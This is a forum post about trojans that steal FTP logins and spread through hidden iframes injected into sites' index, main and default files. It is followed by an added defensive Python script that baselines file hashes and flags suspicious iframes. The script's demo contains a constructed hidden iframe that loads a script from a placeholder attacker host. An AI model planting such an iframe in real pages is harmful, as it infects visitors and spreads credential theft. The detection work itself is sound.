For some time, trojans that sniff FTP login parameters have been giving me big headaches.
Have you met them? How do you handle them?
It works like this:
- you access a compromised site, which contains an iframe that loads a malicious script. Until recently your antivirus did not react to such code.
- the malicious code attacks your browser (IE, Firefox, Opera, PDF reader, Flash... all are vulnerable) and installs itself on your computer.
- you now have a trojan installed. Each time you access any FTP account, the username and password are sniffed and sent to the trojan owner. Some trojans also know how to read saved passwords from some well-known FTP applications, so saving passwords is no longer an option, even if you maintain a number of sites. There are even suspicions that some trojans sniff the keyboard to get passwords.
- after some time, bots start accessing all FTP accounts they know about and alter index*, main*, and default* files, inserting an iframe that loads the malicious code.
- visitors of the sites also get infected, and if they also maintain some sites, their FTP accounts are also compromised.
- there is no antivirus, anti-malware or anti-rootkit that detects these trojans. The only way to find out that you have it is to see that your sites are altered.
Recently, antivirus software started to recognize malicious <iframe> in web pages, but only if it scans HTTP. Also, Google started to block sites where it crawled malicious <iframes>. This helps limit the trojan's spreading, but it is far from successful.
I have lots of problems with this. My clients are asking for my help and I do not know what to say, except that they should format their hard disks and reinstall the system.
My idea was to limit FTP access by IP address, but cPanel does not support that. It can only block a specific address, not block everything but known addresses.
This pest makes the FTP service unusable. If there is no option to control access to FTP, then the only solution is to stop the FTP service altogether.
The good thing is that the trojan is not able to sniff SFTP connections, so using SFTP (check WinSCP) is a good alternative (Dathorn supports it). If you are attacked, change FTP passwords and DO NOT USE FTP ANY MORE.
If you have met this pest, share your experience and knowledge. Do you think we should ask Dathorn to provide some measures to help with this?
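The post says the only way to notice the infection is to see that the site's index*, main* and default* files have been altered with an injected iframe. The script below is an added example of how a site maintainer could automate that check from the server side; it is not code from the post, from Dathorn or from cPanel. It assumes a local copy of the web root (e.g. pulled over SFTP), records a baseline of SHA-256 hashes of the target files while the site is known clean, and on later runs reports any target file that changed or that contains an iframe that is hidden (zero width/height, display:none) or loads from a host outside the site's own hostnames. The sample HTML, the directory layout and the foreign hostname attacker-placeholder.example are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Filename prefixes the post says the bots rewrite (index*, main*, default*).
TARGET_PREFIXES = ("index", "main", "default")

# Crude tag matchers: enough for the injected one-liners the post describes,
# not a full HTML parser. Case-insensitive so <IFRAME SRC=...> is caught too.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"""(?:\bwidth\s*=\s*["']?0\b|\bheight\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden)""",
    re.IGNORECASE,
)


def is_target_file(name):
    """True for the file names the post says get altered (index*, main*, default*)."""
    return name.lower().startswith(TARGET_PREFIXES)


def find_suspicious_iframes(html, own_hosts):
    """Return one dict per <iframe> that is hidden or loads from a host not in own_hosts."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        src_m = SRC_RE.search(tag)
        src = src_m.group(1) if src_m else ""
        host = urlparse(src).hostname  # None for relative URLs, i.e. same site
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden")
        if host is not None and host.lower() not in own_hosts:
            reasons.append("off_site")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


def sha256_file(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def build_baseline(root):
    """Map relative path -> sha256 for every target file under root; run while the site is known clean."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if is_target_file(name):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def scan_webroot(root, own_hosts, baseline=None):
    """Report target files that changed since the baseline or that contain suspicious iframes."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_target_file(name):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            html = Path(full).read_text(errors="replace")
            iframes = find_suspicious_iframes(html, own_hosts)
            changed = baseline is not None and baseline.get(rel) != sha256_file(full)
            if iframes or changed:
                report.append({"file": rel, "changed": changed, "iframes": iframes})
    return sorted(report, key=lambda r: r["file"])


def demo():
    """Constructed scenario: clean site, baseline taken, then index.html altered the way the post describes."""
    own = {"www.example.com"}  # the site's own hostnames; assumed for the demo
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.html").write_text(
            '<html><body><h1>Home</h1><iframe src="/embed/player.html" width="400" height="300"></iframe></body></html>'
        )
        Path(root, "blog").mkdir()
        Path(root, "blog", "default.htm").write_text("<html><body>blog</body></html>")
        Path(root, "about.html").write_text("<html><body>about</body></html>")  # not a target name, ignored
        baseline = build_baseline(root)
        clean = scan_webroot(root, own, baseline)
        # Simulated injection (constructed): a zero-size iframe to a placeholder foreign host appended to index.html.
        injected = '<iframe src="http://attacker-placeholder.example/loader.php" width=0 height=0 style="display:none"></iframe>'
        with open(Path(root, "index.html"), "a") as fh:
            fh.write(injected)
        infected = scan_webroot(root, own, baseline)
    return clean, infected


if __name__ == "__main__":
    before, after = demo()
    print("clean scan:", before)
    print("after injection:", after)
```

In practice the baseline would be written to a file outside the web root and the scan run from cron; a non-empty report is the signal to change the FTP password, switch the account to SFTP as the post recommends, and restore the files from a clean copy.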